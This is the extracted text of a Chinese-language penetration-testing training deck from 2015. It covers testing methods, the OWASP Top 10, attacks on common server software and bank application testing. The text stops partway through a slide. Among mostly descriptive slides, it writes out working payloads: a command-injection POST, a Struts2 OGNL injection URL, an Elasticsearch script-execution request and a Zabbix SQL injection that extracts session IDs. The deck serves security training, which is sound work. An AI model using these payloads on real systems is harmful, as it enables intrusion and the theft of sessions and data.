信息安全技术培训-渗透测试

信息安全技术培训-渗透测试第一页，共82页。信息安全技术培训——渗透测试、演示

刘冬2015-3-28V1.0

第二页，共82页。什么是渗透测试应用程序渗透测试方法互联网攻击常见手段金融行业安全测试第三页，共82页。什么是渗透测试渗透测试（PenetrationTesting）

——是为了证明网络防御按照预期计划正常运行而提供的一种机制。实现原理：

依据

对已知或未知漏洞测试、模拟攻击

目地

重点：降低风险、完善目前的安全策略

特点

人工检测、工具扫描、可控非破坏第四页，共82页。什么是渗透测试渗透测试流程

第五页，共82页。渗透测试渗透测试工具

BurpSuiteHttpAnalvzerIEWatchFiddlerFireBugCharlesHttpliveheadersSQLmapNmapAwvsAppscanHP-WebinspectCoreImpactMetasploitNessusNexpose第六页，共82页。什么是渗透测试应用程序渗透测试方法互联网攻击常见手段金融行业安全测试第七页，共82页。基于Web渗透测试扫描解析输入Web主机风险信息收集解析应用程序分析应用程序，会话机制、客户端控件等SQL、XSS、RFI等测试代理、配置不当，中间件等识别分析与利用第八页，共82页。HackingOWASPTOP10注入漏洞跨站脚本失效的身份验证和回话管理不安全的直接对象引用CSRF安全配置错误不安全的加密存储没有限制URL访问传输层保护不足未验证的重定向和转发第九页，共82页。Hacking注入漏洞——SQL注入Select*fromtable_namewhereid=1Select*fromtable_namewhereid=1’Select*fromtable_namewhereid=1

and1=1Select*fromtable_namewhereid=1and1=2Select*fromtable_namewhereid=1and(select……)InjectionTools:1、SQLHelper2、SQLMAP(v1.0d)第十页，共82页。Hacking注入漏洞——SQL注入事实上，对错误信息进行封装并不一定能阻止攻击者的入侵行为，封装的错误信息，但是攻击己经形成，有攻击者能根据封装的错误信息对攻击结果进行判断，继续实施攻击。其实盲注就是通过封装的消息来收集攻击过程中需要的信息。第十一页，共82页。Hacking注入漏洞——命令注入POST/aim/synRequest.doHTTP/1.1



method=trace_route&ip=&m=5&w=2|ifconfig12第十二页，共82页。Hacking跨站脚本存储型反射型DOM型13第十三页，共82页。Hacking跨站脚本原理简单，利用却不简单WEB2.0是XSS的新温床XSS/CSRFWORM：Samyworm&Sinaweiboworm1、跨站URL：2、由JS发起CSRF：a、发微博b、加关注c、发私信AboutSamyWorm:/wiki/Samy_(XSS)http://namb.la/popular/14第十四页，共82页。Hacking任意文件读取15第十五页，共82页。Hacking任意文件读取16第十六页，共82页。Hacking任意文件读取17第十七页，共82页。Hacking任意文件读取18第十八页，共82页。Hacking任意文件读取19第十九页，共82页。Hacking上传漏洞——修改参数20第二十页，共82页。Hacking上传漏洞——欺骗21第二十一页，共82页。Hacking上传漏洞——APP客户端22第二十二页，共82页。Hacking认证错误——原始信息的校验方式1、不校验——直接构造恶意数据修改密码2、校验COOKIE——CSRF23第二十三页，共82页。Hacking目录遍历——移动代理服务器第二十四页，共82页。Hacking错误信息——“友好”的返回信息25第二十五页，共82页。Hacking错误信息——HTTPFuzzing对错误信息的利用26第二十六页，共82页。Hacking参数错误——权限的鉴别http://site/d477340ffa28755c?OpenDocumenthttp://site/d477340ffa28755c?EditDocumentOpenDocumentEditDocument第二十七页，共82页。Hacking参数错误——权限的鉴别http://site/download.asp?file=/path/down_file.rar第二十八页，共82页。Hacking参数错误——权限的鉴别http://site/download.asp?file=/path/down_file.rar第二十九页，共82页。Hacking逻辑错误一个密码找回的逻辑错误获取验证码为5为纯数字，有效期为30分钟，可以暴力破解。通过HTTPFUZZING获得第三十页，共82页。Hacking逻辑错误第三十一页，共82页。Hacking逻辑错误一个密码找回的逻辑错误第三十二页，共82页。Hacking逻辑错误修改任意账号密码第三十三页，共82页。什么是渗透测试应用程序渗透测试方法互联网攻击常见手段金融行业安全测试34第三十四页，共82页。互联网攻击常见的DjangoCacti0dayFreenasHudsonSquidBeanshellZabbixJboss …第三十五页，共82页。互联网攻击互联网攻防Struts演示如何利用Struts进入你的服务器?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}第三十六页，共82页。互联网攻击互联网攻防Struts演示37第三十七页，共82页。互联网攻击互联网攻防Struts演示梦网合作自助服务12590远程代码执行38第三十八页，共82页。互联网攻击互联网攻防Struts演示移动学院39第三十九页，共82页。互联网攻击互联网攻防Heartbleed、1.0.1a、1.0.1b、1.0.1c、1.0.1d、、、等版本40第四十页，共82页。互联网攻击互联网攻防SplunkXSSOpenSSLTLS心跳信息泄漏漏洞未授权访问代码执行41第四十一页，共82页。互联网攻击互联网攻防Splunk代码执行42第四十二页，共82页。互联网攻击互联网攻防SAP漏洞演示SAPNetWeaver是基于专业标准的集成化应用平台，能够大幅度降低系统整合的复杂性。其组件包括门户、应用服务器、商务智能解决方案以及系统整合和数据整合技术。43第四十三页，共82页。互联网攻击互联网攻防Hadoop通过hadoop,hbase，hdfs0.2RC版本的管理web端能远程执行命令，通过该节点对集群服务器进行任务分发（该是基本功能，当然可以进行批量提权linux主机）渗透进hadoop集群。44第四十四页，共82页。互联网攻击互联网攻防Elasticsearch:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystem.getProperty(\%22\%22)%2b\%22-\%22%2bSystem.getProperty(\%22\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}45第四十五页，共82页。互联网攻击互联网攻防Zend,ThkphpZendframework读取任意文件Demo选择的原因:脚本小子只会读取任意文件，高级黑客能拿来做什么？内网端口扫描内网服务器攻击HTTP攻击暴力破解46第四十六页，共82页。互联网攻击互联网攻防Cacti0day如何利用Cacti进入你的服务器0day47第四十七页，共82页。互联网攻击互联网攻防ZabbixZabbix弱口令SQl注入httpmon.php?applications=2and(select1from(selectcount(*),concat((select(selectconcat(cast(concat(sessionid,0x7e,userid,0x7e,status)aschar),0x7e))fromzabbix.sessionswherestatus=0anduserid=1LIMIT0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)第四十八页，共82页。互联网攻击互联网攻防Zenoss第四十九页，共82页。互联网攻击互联网攻防Hudson创建任务Buildamaven2projectBuild写入execwinshellBuildnowhttp://ip:8080/Buildsconsole第五十页，共82页。互联网攻击互联网攻防HudsonHiveHQL可以通过transform自定义Hive使用的Map/Reduce脚本，从而调用shell/python等语言，默认皆可用，导致攻击者可以通过hive接口等相关操作方式直接获取服务器权限。第五十一页，共82页。互联网攻击互联网攻防Jboss认证绕过控制台密码JMXinvokerServlet第五十二页，共82页。互联网攻击LDAP

53第五十三页，共82页。互联网攻击互联网攻防Rsync,NFSCMS生成html静态文件通过rsync发布DemoNFS漏洞利用…54第五十四页，共82页。互联网攻击互联网攻防VmwareVMwarevCenterOrchestrator在Web管理工具的实现上存在安全漏洞，可被利用泄露vCenter服务器密码。55第五十五页，共82页。互联网攻击互联网攻防F5在多家银行测试发现，导致内网信息泄露第五十六页，共82页。互联网攻击互联网攻防F5登陆绕过验证F5多种设备和9.x/10.x/11.x等多个版本的ssh登录存在root帐号绕过验证的重大漏洞第五十七页，共82页。什么是渗透测试应用程序渗透测试方法互联网攻击常见手段金融行业安全测试第五十八页，共82页。常见漏洞SQL注入Xss跨站脚本攻击1元购买任意商品查看任意账号支付额度修改任意用户密码转账漏洞查看任意账号的账户金额查看任意用户的身份信息短信炸弹……

这种可能性有多大？第五十九页，共82页。其他方向SSRF(服务端请求伪造)如果你的ERP有漏洞，并且存在一个XXE的漏洞那么它通过一个webservices来攻击你的内部核心ERP.第六十页，共82页。其他方向SSRF(服务端请求伪造)ORACLEpeoplesoft环境克隆导致的问题ORACLEERP默认密码ORACLEERP权限问题ORACLEERPiscript问题ORACLEERP中间件问题ORACLEERP数据库问题第六十一页，共82页。其他方向Pentesting攻防HaddoopOpenstackSpringHibernateIbatisMongodb…第六十二页，共82页。其他方向设计缺陷弱口令未授权访问敏感信息网络渗透环境配置不合理致命危害权限绕过拓扑图泄露识别分析与利用第六十三页，共82页。安全测试应用系统漏洞测试点--业务复杂容易产生业务的逻辑安全问题--问题ALL输入测试测试方法：提交恶意参数，观察返回结果第六十四页，共82页。某商行网银渗透测试结果第六十五页，共82页。某商行APP渗透测试结果第六十六页，共82页。权限控制漏洞最常见和最普遍的漏洞，重点测试通过越权的查询操作可导致未授权的用户直接访问不应用访问的资源，导致一些敏感信息的泄露，其中包括查询其他账户余额查询其他账户积分查询其他账户身份信息查询其他账户的其他相关信息安全测试第六十七页，共82页。安全测试应用系统漏洞测试点--安全控件测试使用ComRaider测试ActiveX控件安全密码控件是否有防键盘记录功能登录点测试加密控件是否有对密码进行加密企业网银绕过key保护第六十八页，共82页。安全测试应用系统漏洞测试点数据校验问题使用提交异常数据进行测试提交负数/超大转账金额提交负数/超大积分账户控制积分转换输入输